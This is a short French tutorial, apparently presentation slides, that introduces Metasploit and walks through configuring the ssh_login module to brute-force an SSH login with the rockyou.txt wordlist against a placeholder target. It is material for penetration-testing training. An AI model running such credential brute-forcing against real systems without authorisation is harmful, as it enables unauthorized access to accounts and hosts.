Metasploit est une puissante suite d'outils de test d'intrusion qui permet aux professionnels de la sécurité d'identifier et d'exploiter les vulnérabilités des systèmes informatiques. Il est largement utilisé dans le domaine de la cybersécurité pour réaliser des tests d'intrusion, des évaluations de vulnérabilité et des démonstrations d'attaques.
1
Tests de pénétration
Simulation d'attaques réelles pour évaluer la sécurité des systèmes et réseaux
2
Exploitation de vulnérabilités
Identification et exploitation des failles de sécurité connues dans les systèmes
3
Post-exploitation
Analyse approfondie après compromission pour évaluer l'étendue potentielle d'une attaque
4
Développement d'exploits
Création et test de nouveaux modules d'exploitation pour les vulnérabilités découvertes
Introduction à Metasploit
Qu'est-ce que Metasploit ? Un framework d'exploitation open-source permettant de tester la sécurité des systèmes et d'effectuer des tests de pénétration.
Prérequis pour cette démonstration
Extraire un dictionnaire de mot de passe, avec bruteforce :
gzip -d /usr/share/wordlists/rockyou.txt.gz
Lancer Metasploit
msfconsole
Rechercher dans Metasploit
La commande search permet de rechercher tous les modules ou exploit contenant ssh dans le nom
search ssh_login
Trouver le module qui vous intéressera selon les scénarios. Ici ce sera le module ssh_login.
Charger le module ssh_login
Dans Metasploit, chargez le module de bruteforce SSH :
use auxiliary/scanner/ssh/ssh_login
Configurer les options principales
set RHOSTS <IP_Cible>
set RPORT 22
set USERNAME <ssh_user>
set PASSFILE /usr/share/wordlists/rockyou.txt
Voir la liste des options
show options
Définissez maintenant toutes les autres options qui vous semblent pertinentes